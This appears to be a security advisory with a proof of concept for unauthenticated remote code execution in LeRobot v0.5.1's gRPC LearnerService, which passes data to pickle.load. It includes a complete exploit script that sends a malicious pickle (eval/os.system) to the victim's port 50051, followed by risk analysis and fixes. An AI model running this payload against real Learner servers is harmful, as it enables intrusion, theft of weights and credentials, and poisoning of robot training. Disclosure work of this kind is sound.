LeRobot v0.5.1 Unauthenticated RCE in LearnerService

Below are one (1) way to reproduce RCE in LeRobot using a remote exploit controlled by an attacker (via web), without local intervention by a third party to modify files that allow code execution during the deserialization process.

For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).

Note: While this vulnerability is specifically verified and reported on version 0.5.1, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.

Introduction

LeRobot is Hugging Face's open-source library for state-of-the-art Real-world Robotics. It provides models, datasets, and simulation environments designed to democratize access to robotics AI research, allowing researchers and developers to train policies on simulation environments and transfer them directly to physical robots.

A core component of distributed robotics learning architectures is the Learner node, which coordinates policy optimization across multiple physical robot clients (Actors). Safe design of transport pipelines is crucial for preventing host machine compromise and physical control hijacking.

Vulnerability description

The LearnerService in LeRobot v0.5.1 is part of the distributed HILSerl (Human-In-The-Loop Soft Actor-Critic) training architecture. It enables remote "Actors" (robot clients) to send episodic interaction data to a central "Learner" (server) for processing and model updates.

This service is exposed via gRPC on port 50051 by default and is completely unauthenticated. The SendInteractions method accepts a stream of data that is reassembled and then passed to an insecure pickle.load sink (bytes_to_python_object). An attacker can spoof an Actor instance and send a malicious serialized object, achieving Remote Code Execution (RCE) on the central training server.

The vulnerable code in `lerobot/transport/utils.py` (Sink):

Python (utils.py) Vulnerable Sink

def bytes_to_python_object(buffer: bytes) -> Any:
    bytes_buffer = io.BytesIO(buffer)
    bytes_buffer.seek(0)
    obj = pickle.load(bytes_buffer)  # nosec B301: Safe usage of pickle.load
    # Add validation checks here
    return obj

The vulnerable code in `lerobot/rl/learner.py` (Caller):

Python (learner.py) Vulnerable Caller

def process_interaction_message(
    message, interaction_step_shift: int, wandb_logger: WandBLogger | None = None
):
    """Process a single interaction message with consistent handling."""
    message = bytes_to_python_object(message)

Technical Impact Analysis

Project Purpose & Context

In distributed reinforcement learning, the Learner is the most critical infrastructure component, as it aggregates experience from multiple robots to update the global policy. The LearnerService facilitates this high-bandwidth data exchange, making it a natural but insecure entry point when deployed over network boundaries.

Platform & Deployment Environment

Typically deployed on high-performance Linux or Windows servers equipped with high-end GPUs. These servers are often exposed to a local research network where multiple robot clients (Actors) connect to stream training data during long-running experiments.

Comprehensive Risk Assessment

The risk is Critical. Compromise of the Learner allows an attacker to manipulate the learning process of multiple physical robots simultaneously. Additionally, the Learner environment often contains high-value assets such as proprietary reward functions, environment simulators, and cloud API keys (Hugging Face / WandB) stored for metrics logging and model checkpoints.

Attack Scenario

Who wants to exploit a particular vulnerability?

Adversaries targeting high-tech robotics firms, academic institutions conducting sensitive autonomous systems research, or any entity looking to compromise GPU-heavy infrastructure for lateral movement.

For what gain?

Intellectual property theft (policy architectures, trained weights), infrastructure hijacking (GPU compute resources), and the ability to inject backdoors into the learned behaviors of autonomous agents.

In what way?

By establishing a gRPC stream connection to the LearnerService (port 50051) and calling SendInteractions. The attacker sends a stream of bytes that, when reassembled by the victim, forms a malicious pickle object. The RCE is triggered as soon as the Learner's main loop processes the next message from its internal queue.

Reproduction steps

On Windows (victim) - IP 192.168.1.88

(.venv) PS L:\Deserializer\PYPI-lerobot> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88

1. Create a .venv, activate it, and install the latest updated version (0.5.1) of LeRobot using pip install lerobot.
2. Additionally, it is necessary to install grpcio and protobuf to create a complete testing environment: pip install grpcio protobuf.
3. Create a file named train_config.json with the following content:

train_config.json

{
    "job_name": "poc_hilserl",
    "output_dir": "outputs/poc_hilserl",
    "seed": 42,
    "dataset": {
        "repo_id": "lerobot/pusht"
    },
    "env": {
        "type": "pusht",
        "fps": 10
    },
    "wandb": {
        "enable": false
    },
    "policy": {
        "type": "sac",
        "n_obs_steps": 1,
        "push_to_hub": false,
        "input_features": {
            "observation.state": {
                "type": "STATE",
                "shape": [10]
            }
        },
        "output_features": {
            "action": {
                "type": "ACTION",
                "shape": [4]
            }
        },
        "actor_learner_config": {
            "learner_host": "0.0.0.0",
            "learner_port": 50051
        }
    }
}

4. And then launch the Learner Service:

python -m lerobot.rl.learner --config_path train_config.json

On the Raspberry (attacker) - IP 192.168.1.90

kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90

Create a file named exploit.py with the following content:

exploit.py

import grpc
import pickle
import os
import sys
import time

# Ensure lerobot modules are in path
from lerobot.transport import services_pb2, services_pb2_grpc

class RCE:
    def __reduce__(self):
        # Best Practice: Use 'eval' for self-containment and 'or {}'
        # to ensure the unpickler returns a safe object type (dict).
        return (eval, ("__import__('os').system('calc.exe') or {'Interaction step': 0}",))

def generate_messages(payload):
    # The LearnerService.SendInteractions expects a stream of InteractionMessage
    # It reassembles them using receive_bytes_in_chunks

    # Send as one chunk for simplicity, or split if testing chunking
    yield services_pb2.InteractionMessage(
        transfer_state=services_pb2.TRANSFER_END, # Signals completion to trigger processing
        data=payload
    )

def exploit(target_ip="127.0.0.1", target_port=50051):
    print(f"[*] Attacking LearnerService at {target_ip}:{target_port}...")

    payload = pickle.dumps(RCE())

    channel = grpc.insecure_channel(f"{target_ip}:{target_port}")
    stub = services_pb2_grpc.LearnerServiceStub(channel)

    print("[*] Initiating SendInteractions stream...")
    try:
        # Call the vulnerable streaming method
        stub.SendInteractions(generate_messages(payload))
        print("[+] Stream finished. Triggering processing...")

        # We might need to wait a moment for the Learner main loop to pick it up from the queue
        time.sleep(2)
        print("[+] Check target for execution.")
    except grpc.RpcError as e:
        print(f"[!] gRPC Error: {e.details()}")

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    exploit(target)

Run the exploit to trigger the RCE:

python exploit.py 192.168.1.88

And in the Windows victim machine:

Executive Summary: RCE via Insecure Pickle Deserialization in `LeRobot` LearnerService

The research identifies a critical Remote Code Execution (RCE) vulnerability in the LearnerService of LeRobot v0.5.1.

Root Cause: The LearnerService exposes an unauthenticated gRPC SendInteractions method that reassembles stream data and passes it to an insecure pickle.load sink (bytes_to_python_object).
Exploitation Mechanism: By establishing a gRPC connection to the default port (50051), an attacker can spoof an "Actor" node and transmit a crafted, malicious serialized object. The Learner service automatically deserializes this payload upon arrival in the main processing loop, resulting in immediate code execution.

Analysis of Scope and Security Implications

This vulnerability is of critical severity, as it targets the core infrastructure of distributed robotic training systems.

1. Infection Scenarios

Distributed Infrastructure Hijacking: In a typical HILSerl deployment, the Learner acts as the central command node. An attacker who gains network access to the LearnerService port can execute arbitrary code on the high-performance GPU servers hosting the training process.
Robot-to-Server Pivot: If a single robotic client ("Actor") is compromised via other means, the attacker can use that node to propagate the exploit to the central Learner, effectively poisoning the entire training pipeline.

2. Factors Exacerbating Risk

Zero Authentication: The gRPC service operates without any authentication mechanisms, meaning any device on the network can interact with the Learner and trigger the vulnerable deserialization sink.
High-Value Target Environment: These systems often handle sensitive intellectual property, such as proprietary reward functions, trained model weights, and cloud provider credentials (e.g., Hugging Face, WandB) used for experiment logging, all of which are exposed to the attacker.
Complex Dependencies: By compromising the Learner, an attacker can inject backdoors directly into the policy architectures being learned by the robots, leading to long-term impact on autonomous agent behavior.

Conclusion and Recommendation

This is a critical-severity vulnerability. The combination of network-exposed gRPC streams and pickle-based deserialization creates a direct path for complete system compromise.

Suggested actions for the development team:

Remove Pickle: Immediately replace pickle.load in bytes_to_python_object with a secure, non-executable data serialization format, such as Protobuf or msgpack (with strict type validation).
Implement Authentication: Add mandatory authentication (e.g., mutual TLS or API keys) to the gRPC SendInteractions method to prevent unauthorized access.
Input Validation: If serialization must be complex, implement rigorous allow-listing and integrity signatures to ensure only data from trusted Actors is processed.